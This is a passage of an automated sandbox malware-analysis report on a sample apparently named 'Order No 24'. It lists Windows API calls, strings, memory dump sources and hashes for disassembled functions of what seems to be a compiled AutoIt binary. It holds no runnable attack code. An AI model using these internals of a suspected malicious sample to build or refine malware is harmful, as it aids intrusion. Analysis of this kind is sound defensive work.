                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009A805C
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 009A806F
                                                                                                                                  • __mtinitlocks.LIBCMT ref: 009A7B4C
                                                                                                                                    • Part of subcall function 009A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00A3AC68,00000FA0,?,?,009A7B51,009A5E77,00A36C70,00000014), ref: 009A7E41
                                                                                                                                  • __mtterm.LIBCMT ref: 009A7B55
                                                                                                                                    • Part of subcall function 009A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,009A7B5A,009A5E77,00A36C70,00000014), ref: 009A7D3F
                                                                                                                                    • Part of subcall function 009A7BBD: _free.LIBCMT ref: 009A7D46
                                                                                                                                    • Part of subcall function 009A7BBD: DeleteCriticalSection.KERNEL32(00A3AC68,?,?,009A7B5A,009A5E77,00A36C70,00000014), ref: 009A7D68
                                                                                                                                  • __calloc_crt.LIBCMT ref: 009A7B7A
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009A7BA3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2942034483-0
                                                                                                                                  • Opcode ID: 167a36147ad0d32620d60ce5cb2f4aa489aa0e2b617f0773df4bc8e80bcc13ae
                                                                                                                                  • Instruction ID: 3a82c66229465dac0df031e3688129864ddead28aa6373a7eb7f6ccd6e48b50d
                                                                                                                                  • Opcode Fuzzy Hash: 167a36147ad0d32620d60ce5cb2f4aa489aa0e2b617f0773df4bc8e80bcc13ae
                                                                                                                                  • Instruction Fuzzy Hash: A4F0907210D3121AEA24B7F47C0BB4BA6989F83734F2406A9F8A0C90E2FF21884241F0
                                                                                                                                  Function 009827EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0098281D
                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00982825
                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00982830
                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0098283B
                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00982843
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0098284B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                  • Opcode ID: 0b4ed021063d0fb12ec438d03bb83eb09cf1510823c3f0f9c4401ec8e3ec074e
                                                                                                                                  • Instruction ID: 59504fd36e985c3d85a635ae475179588be1aeac95e671a0f049c2a122b4931f
                                                                                                                                  • Opcode Fuzzy Hash: 0b4ed021063d0fb12ec438d03bb83eb09cf1510823c3f0f9c4401ec8e3ec074e
                                                                                                                                  • Instruction Fuzzy Hash: 530167B1902B5EBDE3008FAA8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                                                                  Function 009C9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1423608774-0
                                                                                                                                  • Opcode ID: bf2d27622c3f15a3478989ee61da448201170e45f9f55a46e735d3e0a6d65af7
                                                                                                                                  • Instruction ID: 89d8be5fa050388d401fe3f061f7ef9e8866237c3fe77547526d923f558c2dc1
                                                                                                                                  • Opcode Fuzzy Hash: bf2d27622c3f15a3478989ee61da448201170e45f9f55a46e735d3e0a6d65af7
                                                                                                                                  • Instruction Fuzzy Hash: 28018133902611ABD715ABD4ED4CFEB7769FF8C701B04042DF503920A4DB74A802DB51
                                                                                                                                  Function 009C7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009C7C07
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009C7C1D
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 009C7C2C
                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C3B
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C45
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C4C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                  • Opcode ID: 4cfa739cc5340220d447cc22334c52dc428bd90c83c525cf8c127bdb3b816cd6
                                                                                                                                  • Instruction ID: abaadf61be885949afd177d14e128f448fe7c899381ff99c00d21bd0f915057d
                                                                                                                                  • Opcode Fuzzy Hash: 4cfa739cc5340220d447cc22334c52dc428bd90c83c525cf8c127bdb3b816cd6
                                                                                                                                  • Instruction Fuzzy Hash: A4F01772641158BBE6219BD29C0EEEF7F7CEBC6B15F000118FA0192051EBA15A43D6B5
                                                                                                                                  Function 009C9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 009C9A33
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A44
                                                                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A51
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A5E
                                                                                                                                    • Part of subcall function 009C93D1: CloseHandle.KERNEL32(?,?,009C9A6B,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C93DB
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 009C9A71
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A78
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                  • Opcode ID: 2c34221f7f8cb96a86f67e6da3bce39b7d22e8772721ccc6dea8f0df364c9a70
                                                                                                                                  • Instruction ID: a74371c70ed6c94812ba7775ba051aae6d25ba4691ca28aae19d631dd3cfba3b
                                                                                                                                  • Opcode Fuzzy Hash: 2c34221f7f8cb96a86f67e6da3bce39b7d22e8772721ccc6dea8f0df364c9a70
                                                                                                                                  • Instruction Fuzzy Hash: 58F08233941215ABD7116BE4EC8DEEB7B39FF8C301B140425F603950A4DB759913DB51
                                                                                                                                  Function 00981CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
                                                                                                                                    • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
                                                                                                                                  • __swprintf.LIBCMT ref: 00981EA6
                                                                                                                                  Strings
                                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00981D49
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                  • API String ID: 2125237772-557222456
                                                                                                                                  • Opcode ID: 786e7f28207433d30f77e1c5e9f864e7c311607f66f1dbd8b40b5956dfbc5c0f
                                                                                                                                  • Instruction ID: 91b0a829080307cdf73867a625ebe56616cc4ba9e06b4444b95f351360c1af4b
                                                                                                                                  • Opcode Fuzzy Hash: 786e7f28207433d30f77e1c5e9f864e7c311607f66f1dbd8b40b5956dfbc5c0f
                                                                                                                                  • Instruction Fuzzy Hash: DD914AB1508205AFC724FF24C995E6AB7A8AFD5700F04492DF996972A2DB30ED05CB92
                                                                                                                                  Function 009DAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009DB006
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 009DB115
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009DB298
                                                                                                                                    • Part of subcall function 009C9DC5: VariantInit.OLEAUT32(00000000), ref: 009C9E05
                                                                                                                                    • Part of subcall function 009C9DC5: VariantCopy.OLEAUT32(?,?), ref: 009C9E0E
                                                                                                                                    • Part of subcall function 009C9DC5: VariantClear.OLEAUT32(?), ref: 009C9E1A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                                  • Opcode ID: bb95d88450706e2a1875d171a5930fde17edfa8be7810a65ee1241acfb0dd1cd
                                                                                                                                  • Instruction ID: 4fcf2de2620dcc0465a852ffe84b569a4d27e10e09fd1da072f8e07db17c074f
                                                                                                                                  • Opcode Fuzzy Hash: bb95d88450706e2a1875d171a5930fde17edfa8be7810a65ee1241acfb0dd1cd
                                                                                                                                  • Instruction Fuzzy Hash: 05917C75648301DFCB10EF24C495A5AB7E8EFC8704F04886EF99A9B3A1DB31E945CB52
                                                                                                                                  Function 009C5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                                                                                                                  • _memset.LIBCMT ref: 009C5438
                                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 009C5467
                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009C5513
                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009C553D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 4152858687-4108050209
                                                                                                                                  • Opcode ID: 3445873ca4982ecca744313708bf9dc13627dd3548f0c7b9ce7f49351c9e2e75
                                                                                                                                  • Instruction ID: 74eb3905ce055e16c37f555f9a70d2c41678ca2985afdb2e18c37eaac782f8a7
                                                                                                                                  • Opcode Fuzzy Hash: 3445873ca4982ecca744313708bf9dc13627dd3548f0c7b9ce7f49351c9e2e75
                                                                                                                                  • Instruction Fuzzy Hash: 36510072A087419BD7149B28C840F6BB7E8AF95360F050A2DF895D31A0DBA4EDC08B53
                                                                                                                                  Function 009C0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009C027B
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009C02B1
                                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009C02C2
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009C0344
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                  • String ID: DllGetClassObject
                                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                                  • Opcode ID: 9e144845c18be2090e6d73f1550017400e617c252076da584bdefab428e27c48
                                                                                                                                  • Instruction ID: 0a02c2f47a44bb8743e2616b5575c41f3dbda136be6081f1c6a5ce4c960eead6
                                                                                                                                  • Opcode Fuzzy Hash: 9e144845c18be2090e6d73f1550017400e617c252076da584bdefab428e27c48
                                                                                                                                  • Instruction Fuzzy Hash: B4417E72A04208EFDB05CF94C884F9A7BB9EF84310F1484ADED099F256D7B5D945CBA1
                                                                                                                                  Function 009C5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C5075
                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 009C5091
                                                                                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009C50D7
                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A41708,00000000), ref: 009C5120
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                                  • Opcode ID: f7a19c2f03de811391f0145221dbb993f716a712e8431407534f3d9634104e09
                                                                                                                                  • Instruction ID: da390705def5c80c32618c53f5097d149a817644fca3a3a5c972c21ad5b80e58
                                                                                                                                  • Opcode Fuzzy Hash: f7a19c2f03de811391f0145221dbb993f716a712e8431407534f3d9634104e09
                                                                                                                                  • Instruction Fuzzy Hash: ED41A071A087019FD720DF24D888F6ABBE8AFC5324F194A1EF89597291D730E940CB63
                                                                                                                                  Function 009CE698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009CE742
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 009CE768
                                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009CE78D
                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009CE7B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                  • String ID: p1#v`K$v
                                                                                                                                  • API String ID: 3321077145-1068180069
                                                                                                                                  • Opcode ID: 11710ba86c6022c83b3bacd9e97dbdd4d26478e8dd0c260a1429575a3ec702b0
                                                                                                                                  • Instruction ID: 5c498d69d615c0097820fc0fc3b303d99c151be107357307ebbf9d6021512742
                                                                                                                                  • Opcode Fuzzy Hash: 11710ba86c6022c83b3bacd9e97dbdd4d26478e8dd0c260a1429575a3ec702b0
                                                                                                                                  • Instruction Fuzzy Hash: 0C416539A00610DFCF15EF54C845A5DBBE5BF89720F088089E946AB3A2CB30FD01DB82
                                                                                                                                  Function 009E0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 009E0587
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharLower
                                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                                  • API String ID: 2358735015-567219261
                                                                                                                                  • Opcode ID: eab75251361c5822486c1145320790f0bd986f2499c591f406b8351722d5a0d8
                                                                                                                                  • Instruction ID: d50866a20d1f1ba40c34f0656c4867f81149a9fd0c27facd635c445e21583abd
                                                                                                                                  • Opcode Fuzzy Hash: eab75251361c5822486c1145320790f0bd986f2499c591f406b8351722d5a0d8
                                                                                                                                  • Instruction Fuzzy Hash: 2131D470500656AFCF00EF58C841AAEB3B8FF95314B108629F466A73D1DB71E955CB50
                                                                                                                                  Function 009BB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009BB88E
                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009BB8A1
                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 009BB8D1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                                  • Opcode ID: 973e5991b3740a3aa764692a7e903bc21b916179a74d600f21cbe2f7759fc68b
                                                                                                                                  • Instruction ID: c3852ba70a887ce04ef290cb3837ce9bdded209eb0ac39b98f9cec1c8aa9510a
                                                                                                                                  • Opcode Fuzzy Hash: 973e5991b3740a3aa764692a7e903bc21b916179a74d600f21cbe2f7759fc68b
